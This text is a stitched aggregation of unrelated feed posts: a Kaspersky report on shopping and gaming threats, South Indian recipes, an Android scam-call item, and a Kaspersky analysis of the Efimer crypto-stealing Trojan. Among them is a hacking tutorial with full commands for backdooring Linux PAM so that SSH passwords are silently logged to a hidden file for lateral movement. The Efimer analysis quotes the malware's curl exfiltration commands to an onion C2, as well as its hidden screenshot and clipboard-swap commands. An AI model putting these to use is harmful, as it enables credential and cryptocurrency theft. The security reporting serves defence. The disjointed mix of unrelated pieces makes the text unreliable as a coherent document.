Androidβs in-call protection now activates during suspicious calls involving financial apps. If you open a banking or payment app while on the line with an unfamiliar number, your phone will warn you, pause actions for 30 seconds, and offer quick safety options.
The post Android phones can warn you if you open financial apps during a scam call appeared first on Digital Trends.
The global eβcommerce market is accelerating faster than ever before, driven by expanding online retail, and rising consumer adoption worldwide. According to McKinsey Global Institute, global eβcommerce is projected to grow by 7β9% annually through 2040.
At Kaspersky, we track how this surge in online shopping activity is mirrored by cyber threats. In 2025, we observed attacks which targeted not only eβcommerce platform users but online shoppers in general, including those using digital marketplaces, payment services and apps for everyday purchases. This year, we additionally analyzed how cybercriminals exploited gaming platforms during Black Friday, as the gaming industry has become an integral part of the global sales calendar. Threat actors have been ramping up their efforts during peak sales events like Black Friday, exploiting high demand and reduced user vigilance to steal personal data, funds, or spread malware.
This report continues our annual series of analyses published on Securelist in 2021, 2022, 2023, andΒ 2024, which examine the evolving landscape of shoppingβrelated cyber threats.
To track how the shopping threat landscape continues to evolve, we conduct an annual assessment of the most common malicious techniques, which span financial malware, phishing pages that mimic major retailers, banks, and payment services, as well as spam campaigns that funnel users toward fraudulent sites. In 2025, we also placed a dedicated focus on gaming-related threats, analyzing how cybercriminals leverage playersβ interest. The threat data we rely on is sourced from the Kaspersky Security Network (KSN), which processes anonymized cybersecurity data shared consensually by Kaspersky users. This report draws on data collected from January through October 2025.
Phishing and scams remain among the most common threats for online shoppers, particularly during high-traffic retail periods when users are more likely to act quickly and rely on familiar brand cues. Cybercriminals frequently recreate the appearance of legitimate stores, payment pages, and banking services, making their fraudulent sites and emails difficult to distinguish from real ones. With customers navigating multiple offers and payment options, they may overlook URL or sender details, increasing the likelihood of credential theft and financial losses.
From January through to October 2025, Kaspersky products successfully blocked 6,394,854 attempts to access phishing links which targeted users of online stores, payment systems, and banks. Breaking down these attempts, 48.21% had targeted online shoppers (for comparison, this segment accounted for 37.5% in 2024), 26.10% targeted banking users (compared to 44.41% in 2024), and 25.69% mimicked payment systems (18.09% last year). Compared to previous years, there has been a noticeable shift in focus, with attacks against online store users now representing a larger share, reflecting cybercriminalsβ continued emphasis on exploiting high-demand retail periods, while attacks on banking users have decreased in relative proportion. This may be related to online banking protection hardening worldwide.
In 2025, Kaspersky products detected and blocked 606,369 phishing attempts involving the misuse of Amazonβs brand. Cybercriminals continued to rely on Amazon-themed pages to deceive users and obtain personal or financial information.
Other major e-commerce brands were also impersonated. Attempts to visit phishing pages mimicking Alibaba brands, such as AliExpress, were detected 54,500 times, while eBay-themed pages appeared in 38,383 alerts. The Latin American marketplace Mercado Libre was used as a lure in 8,039 cases, and Walmart-related phishing pages were detected 8,156 times.
In 2025, phishing campaigns also extensively mimicked other online platforms. Netflix-themed pages were detected 801,148 times, while Spotify-related attempts reached 576,873. This pattern likely reflects attackersβ continued focus on high-traffic digital entertainment services with in-service payments enabled, which can be monetized via stolen accounts.
In 2025, Black Friday-related scams continued to circulate across multiple channels, with fraudulent email campaigns remaining one of the key distribution methods. As retailers increase their seasonal outreach, cybercriminals take advantage of the high volume of promotional communications by sending look-alike messages that direct users to scam and phishing pages. In the first two weeks of November, 146,535 spam messages connected to seasonal sales were detected by Kaspersky, including 2,572 messages referencing Singles day sales.
Scammers frequently attempt to mimic well-known platforms to increase the credibility of their messages. In one of the recurring campaigns, a pattern seen year after year, cybercriminals replicated Amazonβs branding and visual style, promoting supposedly exclusive early-access discounts of up to 70%. In this particular case, the attackers made almost no changes to the text used in their 2024 campaign, again prompting users to follow a link leading to a fraudulent page. Such pages are usually designed to steal their personal or payment information or to trick the user into buying non-existent goods.
Beyond the general excitement around seasonal discounts, scammers also try to exploit consumersβ interest in newly released Apple devices. To attract attention, they use the same images of the latest gadgets across various mailing campaigns, just changing the names of legitimate retailers that allegedly sell the brand.
 |
 |
As subscription-based streaming platforms also take part in global sales periods, cybercriminals attempt to take advantage of this interest as well. For example, we observed a phishing website where scammers promoted an offer for a β12-month subscription bundleβ covering several popular services at once, asking users to enter their bank card details. To enhance credibility, the scammers also include fabricated indicators of numerous successful purchases from other βusers,β making the offer appear legitimate.
In addition to imitating globally recognized platforms, scammers also set up fake pages that pretend to be local services in specific countries. This tactic enables more targeted campaigns that blend into the local online landscape, increasing the chances that users will perceive the fraudulent pages as legitimate and engage with them.
Non-existent Norwegian online store and popular Labubu toys sale
Banking Trojans, or βbankers,β are another tool for cybercriminals exploiting busy shopping seasons like Black Friday in 2025. They are designed to steal sensitive data from online banking and payment systems. In this section, weβll focus on PC bankers. Once on a victimβs device, they monitor the browser and, when the user visits a targeted site, can use techniques like web injection or form-grabbing to capture login credentials, credit card information, and other personal data. Some trojans also watch the clipboard for crypto wallet addresses and replace them with those controlled by the malicious actors.
As online shopping peaks during major sales events, attackers increasingly target e-commerce platforms alongside banks. Trojans may inject fake forms into legitimate websites, tricking users into revealing sensitive data during checkout and increasing the risk of identity theft and financial fraud. In 2025, Kaspersky detected over 1,088,293* banking Trojan attacks. Among notable banker-related cases analysed by Kaspersky throughout the year, campaigns involving the new Maverick banking Trojan distributed via WhatsApp, as well as the Efimer Trojan which spread through malicious emails and compromised WordPress sites can be mentioned, both illustrating how diverse and adaptive banking Trojan delivery methods are.
*These statistics include globally active banking malware, and malware for ATMs and point-of-sale (PoS) systems. We excluded data on Trojan-banker families that no longer use banking Trojan functionality in their attacks, such as Emotet.
Apparently, even the criminal underground follows its own version of a holiday sales season. Once data is stolen, it often ends up on dark-web forums, where cybercriminals actively search for buyers. This pattern is far from new, and the range of offers has remained largely unchanged over the past two years.
Threat actors consistently seize the opportunity to attract βnew customers,β advertising deep discounts tied to high-profile global sales events. It is worth noting that year after year we see the same established services announce their upcoming promotions in the lead-up to Black Friday, almost as if operating on a retail calendar of their own.
We also noted that dark web forum participants themselves eagerly await these seasonal markdowns, hoping to obtain databases at the most favorable rates and expressing their wishes in forum posts. In the months before Black Friday, posts began appearing on carding-themed forums advertising stolen payment-card data at promotional prices.
The gaming industry faces a high concentration of scams and other cyberthreats due to its vast global audience and constant demand for digital goods, updates, and in-game advantages. Players often engage quickly with new offers, making them more susceptible to deceptive links or malicious files. At the same time, the fact that gamers often download games, mods, skins etc. from third-party marketplaces, community platforms, and unofficial sources creates additional entry points for attackers.
The number of attempted attacks on platforms beloved by gamers increased dramatically in 2025, reaching 20,188,897 cases, a sharp rise compared to previous years.
The nearly sevenfold increase in 2025 is most likely linked to the Discord block by some countries introduced at the end of 2024. Eventually users rely on alternative tools, proxies and modified clients. This change significantly expanded the attack surface, making users more vulnerable to fake installers, and malicious updates disguised as workarounds for the restriction.
It can also be seen in the top five most targeted gaming platforms of 2025:
| Platform | The number of attempted attacks |
| Discord | 18,556,566 |
| Steam | 1,547,110 |
| Xbox | 43,560 |
| Uplay | 28,366 |
| Battle.net | 5,538 |
In previous years, Steam consistently ranked as the platform with the highest number of attempted attacks. Its extensive game library, active modding ecosystem, and long-standing role in the gaming community made it a prime target for cybercriminals distributing malicious files disguised as mods, cheats, or cracked versions. In 2025, however, the landscape changed significantly. The gap between Steam and Discord expanded to an unprecedented degree as Steam-related figures remained within their typical fluctuation range of the past five years,Β while the number of attempted Discord-disguised attacks surged more than 14 times compared to 2024, reshaping the hierarchy of targeted gaming platforms.
Attempts to attack users through malicious or unwanted files disguised as Steam and Discord throughout the reported period (download)
From January to October, 2025, cybercriminals used a variety of cyberthreats disguised as popular related to gamers platforms, modifications or circumvention options. RiskTool dominated the threat landscape with 17,845,099 detections, far more than any other category. Although not inherently malicious, these tools can hide files, mask processes, or disable programs, making them useful for stealthy, persistent abuse, including covert crypto-mining. Downloaders ranked second with 1,318,743 detections. These appear harmless but may fetch additional malware among other downloaded files. Downloaders are typically installed when users download unofficial patches, cracked clients, or mods. Trojans followed with 384,680 detections, often disguised as cheats or mod installers. Once executed, they can steal credentials, intercept tokens, or enable remote access, leading to account takeovers and the loss of in-game assets.
| Threat | Gaming-related detections |
| RiskTool | 17,845,099 |
| Downloader | 1,318,743 |
| Trojan | 384,680 |
| Adware | 184,257 |
| Exploit | 152,354 |
In addition to tracking malicious and unwanted files disguised as gamersβ platforms, Kaspersky experts also analysed phishing pages which impersonated these services. Between January and October 2025, Kaspersky products detected 2,054,336 phishing attempts targeting users through fake login pages, giveaway offers, βdiscountedβ subscriptions and other scams which impersonated popular platforms like Steam, PlayStation, Xbox and gaming stores.
Example of Black Friday scam using a popular shooter as a lure
The page shown in the screenshot is a typical Black Friday-themed scam that targets gamers, designed to imitate an official Valorant promotion. The βValorant Points up to 80% offβ banner, polished layout, and fake countdown timer create urgency and make the offer appear credible at first glance. Users who proceed are redirected to a fake login form requesting Riot account credentials or bank card details. Once submitted, this information enables attackers to take over accounts, steal in-game assets, or carry out fraudulent transactions.
Minor text errors reveal the pageβs fraudulent nature. The phrase βYou should not have a size limit of 5$ dollars in your accountβ is grammatically incorrect and clearly suspicious.
Another phishing page relies on a fabricated βWinter Gift Marathonβ that claims to offer a free $20 Steam gift card. The seasonal framing, combined with a misleading counter (β251,110 of 300,000 cards receivedβ), creates an artificial sense of legitimacy and urgency intended to prompt quick user interaction.
The central component of the scheme is the βSign inβ button, which redirects users to a spoofed Steam login form designed to collect their credentials. Once obtained, attackers can gain full access to the account, including payment methods, inventory items, and marketplace assets, and may be able to compromise additional services if the same password is used elsewhere.
 |
 |
Scams themed around the PlayStation 5 Pro and Xbox Series X appear to be generated from a phishing kit, a reusable template that scammers adapt for different brands. Despite referencing two consoles, both pages follow the same structure which features a bold claim offering a chance to βwinβ a high-value device, a large product image on the left, and a minimalistic form on the right requesting the userβs email address.
A yellow banner promotes an βexclusive offerβ with βlimited availability,β pressuring users to respond quickly. After submitting an email, victims are typically redirected to additional personal and payment data-collection forms. They also may later be targeted with follow-up phishing emails, spam, or malicious links.
In 2025, the ongoing expansion of global e-commerce continued to be reflected in the cyberthreat landscape, with phishing, scam activity, and financial malware targeting online shoppers worldwide. Peak sales periods once again created favorable conditions for fraud, resulting in sustained activity involving spoofed retailer pages, fraudulent email campaigns, and seasonal spam.
Threat actors also targeted users of digital entertainment and subscription services. The gaming sector experienced a marked increase in malicious activity, driven by shifts in platform accessibility and the widespread use of third-party tools. The significant rise in malicious detections associated with Discord underscored how rapidly attackers adjust to changes in user behavior.
Overall, 2025 demonstrated that cybercriminals continue to leverage predictable user behavior patterns and major sales events to maximize the impact of their operations. Consumers should remain especially vigilant during peak shopping periods and use stronger security practices, such as two-factor authentication, secure payment methods, and cautious browsing. A comprehensive security solution that blocks malware, detects phishing pages, and protects financial data can further reduce the risk of falling victim to online threats.
Karthigai Pori is a simple and traditional sweet snack we mostly make for Karthigai Deepam festival. It is made by mixing nel pori with a light jaggery syrup along with small bits of coconut and some fried gram dal. This snack has a mild sweetness and a nice chewy feel that suits well for festival evenings.
The flavors are not too heavy, so even if you eat a little extra it doesn't feel tiring. Many people love this simple taste and flavor, this homemade version always tastes better. The mix of jaggery and pori gives a soft crunch that feels quite comforting when eaten fresh.
[feast_advanced_jump_to]Karthigai Pori is a quick sweet which you can make at home with just few simple things. Also puffed rice stays crisp even after mixing it with the jaggery syrup, so it feels very light when you eat it. The jaggery holds the pori together and gives sweetness. The fried gram dal and coconut bits give little crunchy bites in between.
This dish is usually made for Karthigai festival in many South Indian homes. It does not have a strong flavor but has a warm, homely taste that comes only from jaggery and fresh coconut. Many people make two versions of this, one with pori left loose and another shaped into small balls. Both taste almost same, just the texture changes little.
You also get different pori varieties in stores, but for this dish nel pori gives a better taste and holds the syrup properly. Some even add peanuts, dry ginger or little more cardamom for extra smell. The recipe stays simple and easy to adjust depending on what you like, and it still comes out good.
I usually make this in small batches at home because it stays fresh for a few days and is easy to snack in evenings. Kids also like it since the sweetness is not overpowering.
1.Remove the nel skin (the husk) from the pori and make it ready
2.Fry coconut bits in ghee till golden, add this and fried gram dal to nel pori. Mix well and Set aside for later use.
3.Measure jaggery and add it in a pan, add water and dissolve it well.
4.Heat it up for 2 minutes just for the jaggery to get dissolved. Strain to remove impurities.
5.Heat it up again and keep cooking, add elachi powder. Consistency check : Keep a separate plate ready filled with little water. Take a drop of jaggery syrup and put it in water, it should stand firm and not dissolve as shown below. This is enough no need to check rolling and all.
6.When this consistency is reached, add cardamom powder, dry ginger powder, pori and switch off. Mix well so that the syrup coats the pori evenly. Let the mixture cool down then later spread in a plate.
Store in airtight container and enjoy! In summary this karthigai is easy to make and tastes so delicious hence you can make as snack anytime.
Serve this as a snack or even as a small sweet after your meal. It goes well with tea also if you like something mild and sweet in the evening time.
Store leftovers in a airtight box after it cools down fully. It stays good for almost three to four days in room temperature.
You can use regular pori, but nel pori gives better crunch and flavor for this dish.
Yes, you can skip it or replace with peanuts if you want more crunch.
The syrup might have cooked too long or the pori was not fresh. Using fresh pori always gives better result.
Yes, but the syrup needs to reach little stronger stage. Follow the same recipe and shape while it is still warm.
It stays good for few days in airtight container, but finish early if you used fresh coconut.
If you have any more questions on making of this Karthigai Pori do mail me at sharmispassions@gmail.com
Follow me on Instagram, Facebook, Pinterest ,Youtube and Twitter .
Tried this Karthigai Pori? Do let me know how you liked it.Tag us on Instagram @sharmispassions and hash tag it on #sharmispassions.
The post Karthigai Pori Recipe appeared first on Sharmis Passions.
Sorghum Dosa is a light and healthy dosa made using sorghum, rice and urad dal. It comes soft in middle and little crisp at edges, making it so good to have for breakfast or even dinner. The flavor is mild, earthy and comforting with that small nutty taste from sorghum.
You can make this dosa as it fills the tummy but still feels light. Sorghum, also called cholam, is rich in fiber and iron, and it keeps you full for long time. It's one nice way to include millets in daily food without feeling too plain or healthy. You can even use the same batter for idli also, which makes it more helpful.
[feast_advanced_jump_to]Sorghum Dosa or Chola Dosa is a South Indian style dosa made with sorghum, rice and urad dal. The ingredients are soaked, ground smooth then left to ferment overnight. After fermentation, the batter becomes soft and bit airy which helps dosa to turn light and slightly crisp.
This dosa tastes little different from regular dosa but has nice earthy flavor that goes so well with chutney and sambar. When cooked well, the dosa turns golden at edges and stays soft in center. I feel the taste of this dosa is mild and homely.
There are few variations also. You can also use cholam flour for quick version but I like to soak and grind whole grain, it gives better texture and that fresh aroma after cooking. You can even mix other millets like varagu or thinai along with cholam for a change in taste and flavor.
Sorghum is also known as Jowar in Hindi, we call it Cholam in Tamil, It is also called as white millet. This is a good source of dietary fiber, it is gluten-free, high in protein, cholesterol free millet. I usually make this on weekends or when I feel to eat something simple and healthy. It takes some soaking time but very less effort otherwise.
1.Measure all the ingredients and soak it in a wide bowl with enough water till immersing level. Soak this for at least 3-4 hours.
2.Rinse it well, mittu is helping me with this, then wash it well at least twice. Then grind it to a thickish batter with little water. The batter consistency should be neither thick nor thin. I grinded it in my wet grinder, you can do it mixer too but grinder is recommended.
3.Add required salt, mix it and keep it undisturbed for it to ferment. Leave it in warm place for at least 8 hours, I left it overnight. See the fermented batter the next day, it has raised well.
4.You can see the tetxure, mix it once then add water to make the batter thin.
5.Adjust and add water till it is in pour-able and spreadable consistency. Heat a dosa tawa, if you sprinkle water it should give shh sound then the tawa is hot, now add 2 small ladle full of batter and spread it in concentric circles. Drizzle oil over the sides and in the middle.
6.Cook till it becomes golden in the center and the edges starts lifting up, flip to other side and cook for 2 minutes turn again flip over and fold it. Remove from tawa and Serve.
Serve hot with chutney and sambar.
Serve this hot with coconut chutney or sambar. I drizzle small spoon of ghee or gingelly oil on top, it gives nice flavor and little shine too. This dosa tastes best when served hot and hot. If you have leftover batter, keep it in fridge, it stays good for two days.
Yes, you can use the flour, but dosa will not be as soft as made with whole grains.
You can, but dosa may turn bit thick and not spread easily. Rice helps with softness and texture.
Maybe weather was cold. Keep it near stove or warm area for few more hours.
Yes, just keep batter thick and you can make soft idlis also.
You can keep in fridge up to 2 days. Mix well before making dosa again.
If you have any more questions about this Sorghum Dosa do mail me at sharmispassions@gmail.com. In addition, follow me on Instagram,Β Facebook,Β PinterestΒ ,YoutubeΒ andΒ TwitterΒ .
Tried this Sorghum Dosa? Do let me know how you liked it. Also tag us on Instagram @sharmispassions and hash tag it on #sharmispassions.
The post Sorghum Dosa | Chola Dosai | Jowar Dosa appeared first on Sharmis Passions.
Thai green curry is a rich creamy, delicious and flavourful curry. It is quite similar to our Indian vegetable kurma, but made with Thai based ingredients. The star ingredient of this curry is Thai green curry paste, which is made from fresh spices and herbs like lemon grass, kaffir lime, galangal, green chillies, ginger, garlic...
The post Thai Veg Green Curry Recipe appeared first on Yummy Tummy.
Welcome back, my aspiring cyberwarriors!
Landing on a Linux machine after exploitation or with freshly harvested credentials often feels like a victory, but in reality, it is only the beginning of the struggle. Lateral movement in Linux environments is notoriously trickier than in Windows domains. Even if you manage to obtain root on one host, you might quickly hit a wall: you see evidence of users connecting to other systems, but you donβt have their credentials. Without those, further expansion stalls. Techniques such as dumping memory or scraping process data might work in some cases, but SSH processes in particular wonβt reveal user credentials so easily. At first glance, it feels like a dead end.
This is where PAM manipulation comes into play. By modifying how the Pluggable Authentication Module handles logins, it becomes possible to quietly capture user credentials whenever they authenticate. This is how you create a systematic way to harvest SSH passwords and reuse them for lateral movement.
Before diving into PAM patching, it is useful to gather some context about the network and where legitimate users are connecting. SSH clients store previously accessed servers in a known_hosts file under each userβs .ssh directory. If those files are accessible, they give a list of destinations without the need for noisy scanning.
For example, inspecting /home/dev3/.ssh/known_hosts might reveal entries such as git. That single clue suggests a pivot point. If the compromised machine is in a restricted environment, that host may sit in another subnet or behind access controls you couldnβt otherwise reach. With the right credentials, this file becomes a roadmap for lateral movement.
Before implementing a credential capture mechanism, itβs important to ensure the host accepts password-based logins. SSHD can be configured to forbid password authentication entirely, relying solely on key-based access. To enable credential capture, the following must be set in /etc/ssh/sshd_config:
target# > nano /etc/ssh/sshd_config
PasswordAuthentication yes
Once this change is in place, the groundwork is set.
The next step is creating a small script that will record login attempts. With root privileges, create a new file at /usr/local/bin/logc.sh:
target# > nano /usr/local/bin/logc.sh
Login
#!/bin/bash
echo "$(date) User: $PAM_USER Password: $(cat -), From: $PAM_RHOST" >> /var/log/.authc.logMake it executable:
target# > chmod 777 /usr/local/bin/logc.sh
Then prepare the hidden log file that will quietly collect captured data:
target# > touch /var/log/.authc.log
This script is simple yet powerful. It captures the username, the plaintext password, the source of the connection, and timestamps each entry.
With the logging script in place, the next task is to insert it into the PAM authentication chain. PAM configurations vary slightly between distributions, but for SSH specifically, the relevant file is /etc/pam.d/sshd. For broader system-wide coverage, other files such as /etc/pam.d/common-auth (Debian/Ubuntu) or /etc/pam.d/password-auth (CentOS) could be patched instead.
To modify SSH authentication only, open /etc/pam.d/sshd and add the following line at the very top:
target# > nano /etc/pam.d/sshd
auth optional pam_exec.so quiet expose_authtok /usr/local/bin/logc.shThis ensures that every authentication attempt, successful or not, passes through the logging script before continuing with normal PAM processing. Credentials are silently exfiltrated while legitimate users remain unaware.
For the changes to take effect, restart the SSH service:
target# > service sshd restart
Once restarted, test the patch by logging in with valid credentials.
Afterwards, check the log file:
target# > cat /var/log/.authc.log
Each entry should display the captured user, the password they entered, the remote host they connected from, and the date of the attempt. Over time, this log will accumulate valuable credentials from legitimate user sessions, giving you a resource for lateral movement.
There is a great method of harvesting SSH credentials on Linux by modifying the Pluggable Authentication Module (PAM). After identifying potential lateral movement targets via known_hosts, SSH is reconfigured to allow password authentication. A custom logging script is created to capture usernames, passwords, and remote sources, and is then integrated into PAM by editing /etc/pam.d/sshd. With the patch in place, every login attempt is silently recorded to a hidden log file. Restarting SSH activates the change, and future connections yield a steady stream of usable credentials.Β
The post Password Cracking: Stealing SSH Credentials with PAM first appeared on Hackers Arise.
Spicy chicken chukka is an authentic South Indian recipe. The word "chukka" refers to a dry dish, where the meat or vegetables are cooked with spice masala coating. This chicken chukka tastes really delicious and is a mouth watering recipe too. It is made with fresh spices like cardamom, cloves, cinnamon, dry red chilli, cumin...
The post Spicy Chukka Chicken Recipe appeared first on Yummy Tummy.
Chettinad masala kuzhambu is a signature Tamilnadu delicacy from the vibrant Chettinad cuisine, which is famous for its intense spice blend and rustic flavours. This gravy is made by cooking brinjal in a rich base of coconutΒ onion, tomato and fennel seeds which is enhanced by grounded spices. Chettinad Masala Kuzhambu I have been making...
The post Chettinad Masala Kuzhambu Recipe appeared first on Yummy Tummy.
Β Nei Appam is one of the most important Neivedhiyams / Prasadams made during Janmashtami,Β Ganesh Chaturthi,Β Karthigai,Β Avani Avittam and lot more poojas or rituals like Ganapathi Homam, Bhagavathi Sevai etc .
Instant version can be made using rice flour,but this is a classic version by soaking and grinding rice along with cardamom, ripe bananas and jaggery.Β Adding grated coconut or slivered coconut bits gives a nice taste and texture to the appam.Β
I add a teaspoon of udad dhall while soaking the rice, this gives a nice texture and softness to the Neiappams . By adding the udad dhall , we can avoid the use of cooking soda . Udad dhall automatically gives the appam the softness and fluffy texture.Β
We can using melted jaggery syrup while grinding the appam batter or if we are using good quality powdered jaggery without dust, then we can add it to the rice while grinding.Β
Grinding jaggery with rice is an easier way to seamlessly blend the rice and jaggery without lumps .
For Krishna Jayanthi, it is said that if we are unable to makeΒ elaborate prasadams for Krishnar , we can offerΒ
Navaneetham (Butter + sugar candy)
Nei appam
Aval PayasamΒ (Poha Kheer)
Thayir Aval / GopalkaalaΒ (Dahi Poha)
Paal / Milk.
IngredientsΒ
Procedure
Pinterest Link - https://pin.it/4r11xefoZ
In June, we encountered a mass mailing campaign impersonating lawyers from a major company. These emails falsely claimed the recipientβs domain name infringed on the senderβs rights. The messages contained the Efimer malicious script, designed to steal cryptocurrency. This script also includes additional functionality that helps attackers spread it further by compromising WordPress sites and hosting malicious files there, among other techniques.
Report summary:
Kaspersky products classify this threat with the following detection verdicts:
In June, we detected a mass mailing campaign that was distributing identical messages with a malicious archive attached. The archive contained the Efimer stealer, designed to pilfer cryptocurrency. This malware was dubbed βEfimerβ because the word appeared in a comment at the beginning of its decrypted script. Early versions of this Trojan likely emerged around October 2024, initially spreading via compromised WordPress websites. While attackers continue to use this method, they expanded their distribution in June to include email campaigns.
Part of the script with comments
The emails that users received claimed that lawyers from a large company had reviewed the recipientβs domain and found words or phrases in its name that infringed upon their registered trademarks. The emails threatened legal action but offered to drop the lawsuit if the domain owner changed the domain name. Furthermore, they even expressed willingness to purchase the domain. The specific domain was never mentioned in the email. Instead, the attachment supposedly contained βdetailsβ about the alleged infringement and the proposed buyout amount.
Sample email
In a recent phishing attempt, targets received an email with a ZIP attachment named βDemand_984175β (MD5: e337c507a4866169a7394d718bc19df9). Inside, recipients found a nested, password-protected archive and an empty file named βPASSWORD β 47692β. Itβs worth noting the clever obfuscation used for the password file: instead of a standard uppercase βSβ, the attackers used the Unicode character U+1D5E6. This subtle change was likely implemented to prevent automated tools from easily extracting the password from the filename.
Archive contents
If the user unzips the password-protected archive, theyβll find a malicious file named βRequirement.wsfβ. Running this file infects their computer with the Efimer Trojan, and theyβll likely see an error message.
Error message
Hereβs how this infection chain typically plays out. When the Requirement.wsf script first runs, it checks for administrator privileges. It does this by attempting to create and write data to a temporary file at C:\\Windows\\System32\\wsf_admin_test.tmp. If the write is successful, the file is then deleted. What happens next depends on the userβs access level:
C:\\Users\\Public\\controllerΒ folder to the Windows Defender antivirus exclusions. This folder will then be used to store various files. It also adds to exclusions the full path to the currently running WSF script and the system processes C:\\Windows\\System32\\exe and C:\\Windows\\System32\\cmd.exe. Following this, the script saves two files to the aforementioned path: βcontroller.jsβ (containing the Efimer Trojan) and βcontroller.xmlβ. Finally, it creates a scheduler task in Windows, using the configuration from controller.xml.HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\controller registry key. The controller is then launched via the WScript utility.
Afterward, the script uses WScript methods to display an error message dialog box and then exits. This is designed to mislead the user, who might be expecting an application or document to open, when in reality, nothing useful occurs.
The controller.js script is a ClipBanker-type Trojan. Itβs designed to replace cryptocurrency wallet addresses the user copies to their clipboard with the attackerβs own. On top of that, it can also run external code received directly from its command-and-control server.
The Trojan starts by using WMI to check if Task Manager is running.
If it is, the script exits immediately to avoid detection. However, if Task Manager isnβt running, the script proceeds to install a Tor proxy client on the victimβs computer. The client is used for communication with the C2 server.
The script has several hardcoded URLs to download Tor from. This ensures that even if one URL is blocked, the malware can still retrieve the Tor software from the others. The sample we analyzed contained the following URLs:
| https://inpama[.]com/wp-content/plugins/XZorder/ntdlg.dat |
| https://www.eskisehirdenakliyat[.]com/wp-content/plugins/XZorder/ntdlg.dat |
| https://ivarchasv[.]com/wp-content/plugins/XZorder/ntdlg.dat |
| https://echat365[.]com/wp-content/plugins/XZorder/ntdlg.dat |
| https://navrangjewels[.]com/wp-content/plugins/XZorder/ntdlg.dat |
The file it downloads from one of the URLs (A46913AB31875CF8152C96BD25027B4D) is the Tor proxy service. The Trojan saves it to C:\\Users\\Public\\controller\\ntdlg.exe. If the download fails, the script terminates.
Assuming a successful download, the script launches the file with the help of WScript and then goes dormant for 10 seconds. This pause likely allows the Tor service to establish a connection with the Onion network and initialize itself. Next, the script attempts to read a GUID from C:\\Users\\Public\\controller\\GUID. If the file cannot be found, it generates a new GUID via createGUID() and saves it to the specified path.
The GUID format is always vs1a-<4 random hex characters>, for example, vs1a-1a2b.
The script then tries to load a file named βSEEDβ from C:\\Users\\Public\\controller\\SEED. This file contains mnemonic phrases for cryptocurrency wallets that the script has collected. Weβll delve into how it finds and saves these phrases later in this post. If the SEED file is found, the script sends it to the server and then deletes it. These actions assume that the script might have previously terminated improperly, which would have prevented the mnemonic phrases from being sent to the server. To avoid losing collected data in case of an error, the malware saves them to a file before attempting to transmit them.
At this point, the controller concludes its initialization process and enters its main operation cycle.
In each cycle of operation, the controller checks every 500 milliseconds whether Task Manager is running. As before, if it is, the process exits.
If the script doesnβt terminate, it begins to ping the C2 server over the Tor network. To do this, the script sends a request containing a GUID (Globally Unique Identifier) to the server. The serverβs response will be a command. To avoid raising suspicion with overly frequent requests while maintaining constant communication, the script uses a timer (the p_timerΒ variable).
As we can see, every 500 milliseconds (half a second), immediately after checking if Task Manager is running, p_timerΒ decrements by 1. When the variable reaches 0 (itβs also zero on the initial run), the timer is reset using the following formula: the PING_INT variable, which is set to 1800, is multiplied by two, and the result is stored in p_timer. This leaves 1800 seconds, or 30 minutes, until the next update. After the timer updates, the PingToOnion function is called, which we discuss next. Many similar malware strains constantly spam the network, hitting their C2 server for commands. The behavior quickly gives them away. A timer allows the script to stay under the radar while maintaining its connection to the server. Making requests only once every half an hour makes them much harder to spot in the overall traffic flow.
The PingToOnion function works hand-in-hand with CheckOnionCMD. In the first one, the script sends a POST request to the C2 using the curl utility, routing the request through a Tor proxy located at localhost:9050 at the address:
http://cgky6bn6ux5wvlybtmm3z255igt52ljml2ngnc5qp3cnw5jlglamisad[.]onion/route.php
The serverβs response is saved to the userβs %TEMP% directory at %TEMP%\cfile.
curl -X POST -d "' + _0x422bc3 + '" --socks5-hostname localhost:9050 ' + PING_URL + ' --max-time 30 -o ' + tempStrings + '\\cfile
After a request is sent to the server, CheckOnionCMD immediately kicks in. Its job is to look for a server response in a file named βcfileβ located in the %TEMP% directory. If the response contains a GUID command, the malware does nothing. This is likely a PONG response from the server, confirming that the connection to the C2 server is still alive and well. However, if the first line of the response contains an EVAL command, it means all subsequent lines are JavaScript code. This code will then be executed using the eval function.
Regardless of the serverβs response, the Trojan then targets the victimβs clipboard data. Its primary goal is to sniff out mnemonic phrases and swap copied cryptocurrency wallet addresses with the attackerβs own wallet addresses.
First, it scans the clipboard for strings that look like mnemonic (seed) phrases.
If it finds any, these phrases are saved to a file named βSEEDβ (similar to the one the Trojan reads at startup). This file is then exfiltrated to the server using the PingToOnion function described above with the action SEED parameter. Once sent, the SEED file is deleted. The script then takes five screenshots (likely to capture the use of mnemonic phrases) and sends them to the server as well.
They are captured with the help of the following PowerShell command:
powershell.exe -NoProfile -WindowStyle Hidden -Command "$scale = 1.25; Add-Type -AssemblyName System.Drawing; Add-Type -AssemblyName System.Windows.Forms; $sw = [System.Windows.Forms.SystemInformation]::VirtualScreen.Width; $sh = [System.Windows.Forms.SystemInformation]::VirtualScreen.Height; $w = [int]($sw * $scale); $h = [int]($sh * $scale); $bmp = New-Object Drawing.Bitmap $w, $h; $g = [Drawing.Graphics]::FromImage($bmp); $g.ScaleTransform($scale, $scale); $g.CopyFromScreen(0, 0, 0, 0, $bmp.Size); $bmp.Save(\'' + path.replace(/\\/g, '\\\\') + '\', [Drawing.Imaging.ImageFormat]::Png); ' + '$g.Dispose(); $bmp.Dispose();"
The FileToOnion function handles sending files to the server. It takes two arguments: the file itself (in this case, a screenshot) and the path where it needs to be uploaded.
Screenshots are sent to the following path on the server:
http://cgky6bn6ux5wvlybtmm3z255igt52ljml2ngnc5qp3cnw5jlglamisad[.]onion/recvf.php
Files are also sent via a curl command:
curl -X POST -F "file=@' + screenshot + '" ' + '-F "MGUID=' + GUID + '" ' + '-F "path=' + path + '" ' + '--socks5-hostname localhost:9050 "' + FILE_URL + '"
After sending the file, the script goes idle for 50 seconds. Then, it starts replacing cryptocurrency wallet addresses. If the clipboard content is only numbers, uppercase and lowercase English letters, and includes at least one letter and one number, the script performs additional checks to determine if itβs a Bitcoin, Ethereum, or Monero wallet. If a matching wallet is found in the clipboard, the script replaces it according to the following logic:
This clipboard swap is typically executed with the help of the following command:
cmd.exe /c echo|set/p= + new_clipboard_data + |clip
After each swap, the script sends data to the server about both the original wallet and the replacement.
As mentioned above, in addition to email, the Trojan spreads through compromised WordPress sites. Attackers search for poorly secured websites, brute-force their passwords, and then post messages offering to download recently released movies. These posts include a link to a password-protected archive containing a torrent file.
![Here's an example of such a post on https://lovetahq[.]com/sinners-2025-torent-file/](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/08/07001809/efimer-trojan15.png)
Hereβs an example of such a post on https://lovetahq[.]com/sinners-2025-torent-file/
Downloaded files
